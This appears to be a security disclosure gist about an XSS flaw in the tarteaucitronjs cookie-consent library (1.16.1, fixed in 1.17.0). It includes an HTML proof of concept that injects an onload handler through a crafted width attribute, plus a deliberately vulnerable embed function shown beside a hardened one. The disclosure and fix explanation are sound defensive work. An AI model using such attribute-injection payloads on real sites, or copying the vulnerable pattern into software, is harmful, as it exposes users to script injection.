Rudloff/xss.md

Last active February 9, 2025 11:09
XSS fix in tarteaucitronjs 1.17.0

The 1.16.1 release of tarteaucitronjs is marked as safe on Snyk: https://security.snyk.io/package/npm/tarteaucitronjs/1.16.1

However, release 1.17.0 contains a fix for potential XSS vulnerabilities: https://github.com/AmauriC/tarteaucitron.js/commit/12490579001d5caa187adcaecb01da570a12076b. This fix is a follow-up to the vulnerability fixed in 1.16.0 (https://security.snyk.io/vuln/SNYK-JS-TARTEAUCITRONJS-8366541): 1.16.0 fixed most of the vulnerable methods but left getElemWidth() and getElemHeight() unpatched.

PoC

Install tarteaucitronjs 1.16.1 and use the following code:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <title>TAC XSS</title>
    <meta charset="UTF-8">
    <script src="tarteaucitron.js"></script>
    <script>
        (tarteaucitron.job = tarteaucitron.job || []).push('googlemapsembed');
        tarteaucitron.init({});
    </script>
</head>
<body>
<div class="googlemapsembed" data-url=x width='" onload="alert()'></div>
</body>
</html>
```

Open this HTML in a browser and accept the Google Maps Embed service: the malicious JS is executed.
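The PoC works because a raw `width` attribute value is spliced into an HTML string, so a double quote in it closes the attribute and opens a new one. The following is an added illustrative example of that bug class beside a hardened dimension handler; it is not code from tarteaucitron.js or from the 1.17.0 commit, and the function names, the accepted dimension syntax and the fallback values are assumptions.

```javascript
// Hypothetical reconstruction of the bug class, not tarteaucitron.js's own code.
// An embed helper reads a dimension from a DOM attribute and splices it into markup.
// If the raw value reaches the string, a quote in it breaks out of the width attribute.
function buildEmbedVulnerable(url, width, height) {
  return '<iframe src="' + url + '" width="' + width + '" height="' + height + '"></iframe>';
}

// Hardened: a dimension may only be an unsigned integer, optionally suffixed with px or %.
// Anything else (quotes, spaces, event-handler text) is rejected and replaced by a default.
// Assumed syntax; adjust the regex if the embed needs other CSS units.
const DIMENSION_RE = /^\d{1,5}(px|%)?$/;
function safeDimension(value, fallback) {
  const v = String(value == null ? '' : value).trim();
  return DIMENSION_RE.test(v) ? v : fallback;
}

// Minimal HTML attribute escaping for the URL, which may legitimately contain & or quotes.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function buildEmbedSafe(url, width, height) {
  // Fallback sizes are assumptions for this example, not the library's defaults.
  const w = safeDimension(width, '600');
  const h = safeDimension(height, '450');
  return '<iframe src="' + escapeAttr(url) + '" width="' + w + '" height="' + h + '"></iframe>';
}

// Constructed input mirroring the gist's PoC attribute: width='" onload="alert()'
const POC_WIDTH = '" onload="alert()';
const vulnerableMarkup = buildEmbedVulnerable('x', POC_WIDTH, '450');
const safeMarkup = buildEmbedSafe('x', POC_WIDTH, '450');
console.log('vulnerable contains onload:', vulnerableMarkup.includes('onload'));
console.log('hardened contains onload:  ', safeMarkup.includes('onload'));
```

Validating the value against an allow-list of dimension syntax is preferable to escaping alone, because a width such as `" onload="...` has no legitimate meaning and should never reach the markup in any form.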
